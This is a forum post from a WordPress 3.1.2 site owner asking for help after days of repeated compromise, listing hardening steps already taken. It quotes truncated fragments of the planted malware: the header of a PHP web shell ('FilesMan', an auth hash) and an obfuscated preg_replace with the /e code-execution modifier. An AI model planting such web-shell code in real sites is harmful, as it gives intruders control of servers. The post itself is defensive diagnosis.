Major Security Issues / Under constant attack | *** Help!

I’m at a complete loss at this point.

Hackers haven been compromising our WP3.1.2 install for the last 5 days around the clock and managed to introduce both “<iframe..>” content in my secure wp-config.php as well as Malware PHP files across several folders.

I tightened security all over the place, but they still are able to introduce new PHP files across the filesystem regardless off file & folder permissions:

Some of those Malware files incude content such as:

<?php
$auth_pass = "5bd3898279e9024046c38271e135db80";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;

&

<?php
preg_replace("/aoRJfwFgvd1uhhs45xuh1R3y/e", "uOwQScq6H84YA5GeyGYHg04WJ8Pc

and other stuff. They even modified folder permissions and (!) .htaccess (perm: 440!).

I thought our system (new install, WordPress 3.1.2) was pretty secure to begin with, here is what else we did:

* _all_ folders _except_ the Super Cache folder are non writable, mostly 550
* all of the typical .htaccess (and more) relevant settings are in place, perm = 400
* no POST without proper site REFERRER
* capturing other REQUEST TYPES, eg HEAD, TRACE…
* filtering QUERY_STRINGS
* wp-config, wp-admin, login are protected (apache login/pw)
* plus… roughly 60 lines dedicated to filter hack/spam attempts

* Secured WP via plugins (no version generator / capturing malicious requests)

* PHP.ini settings
* safe mode on, register_globals off, allow_url_fopen off etc.

* Server Quota in place

* wp-config.php has been replaced with a “dummy” pointing to a secure place
-> created a new secure folder (500) including a pseudo wp-config.php (400)

* new,secure wp-config, configured with
* define(‘WP_DEBUG’, false);
* NEW $table_prefix

* Changed all passwords (DB, FTP, WP Logins)

* Ran a virus and Malware check on our local computers: they’re clean

We’re at a loss, any idea what else to look out for? Every other hour we start cleaning infected files afresh…

Thanks for anything you can think of….

F.